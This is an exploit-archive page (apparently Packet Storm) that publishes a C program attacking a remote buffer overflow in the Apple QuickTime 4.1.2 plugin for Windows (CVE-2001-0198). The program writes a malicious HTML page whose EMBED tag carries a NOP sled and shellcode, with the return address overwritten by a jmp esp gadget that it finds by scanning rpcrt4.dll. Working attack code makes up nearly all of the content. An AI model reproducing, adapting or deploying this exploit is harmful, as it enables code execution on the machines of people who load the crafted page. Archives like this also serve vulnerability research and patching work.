exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apple Windows Quicktime Plugin 4.1.2 Overflow

Apple Windows Quicktime Plugin 4.1.2 Overflow
Posted Aug 18, 2012
Authored by Unyun

The Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow vulnerability.

tags | exploit, remote, overflow
systems | windows, apple
advisories | CVE-2001-0198
SHA-256 | 1adf5c5c72d01c4624b85ffdd0aae6d195be716d1822865789e2e22f95233ac4

Apple Windows Quicktime Plugin 4.1.2 Overflow

Change Mirror Download
Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.

/*====================================================================
Apple QuickTime 4.1.2 plug-in exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
====================================================================
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define MOV_FILE "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT 60
#define WIDTH 60
#define TARGET "QUICKTIMEPLAYER"
#define FILE_IMAGE \
"<html><embed src=\"%s\" href=\"%s\" "\
"width=%d height=%d autoplay=\"true\" "\
"target=\"%s\"><br></html>"
#define BUFSIZE 730
#define RET 684
#define ESP_TGT "rpcrt4.dll"
#define JMPESP_1 0xff
#define JMPESP_2 0xe4
#define NOP 0x90

unsigned char exploit_code[200]={
0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
0xFF,0xD0,0x00,
};

main(int argc,char *argv[])
{
FILE *fp;
char buf[BUFSIZE];
unsigned int i,pretadr,p,ip,kp;
MEMORY_BASIC_INFORMATION meminfo;

if (argc<2){
printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
argv[0]);
exit(1);
}

if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
printf("%s is not found.\n",ESP_TGT);
exit(1);
}

VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
pretadr=0;
for (i=0;i<meminfo.RegionSize;i++){
p=kp+i;
if ( ( p &0xff)==0
|| ((p>>8 )&0xff)==0
|| ((p>>16)&0xff)==0
|| ((p>>24)&0xff)==0) continue;
if ( *((unsigned char *)p)==JMPESP_1
&& *(((unsigned char *)p)+1)==JMPESP_2)
pretadr=p;
}
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("File write error \"%s\"\n",argv[1]);
exit(1);
}
memset(buf,NOP,BUFSIZE);
memcpy(buf+700-12,exploit_code,strlen(exploit_code));
buf[BUFSIZE-2]=0;

ip=pretadr;
printf("EIP=%x\n",ip);
buf[RET ]=ip&0xff;
buf[RET+1]=(ip>>8)&0xff;
buf[RET+2]=(ip>>16)&0xff;
buf[RET+3]=(ip>>24)&0xff;

if (argc==2)
fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
else
fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
fclose(fp);
printf("Done.\n");
}

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
shadowpenguin@backsection.net (SPS-Official)
unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
unyun@eEye.com


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close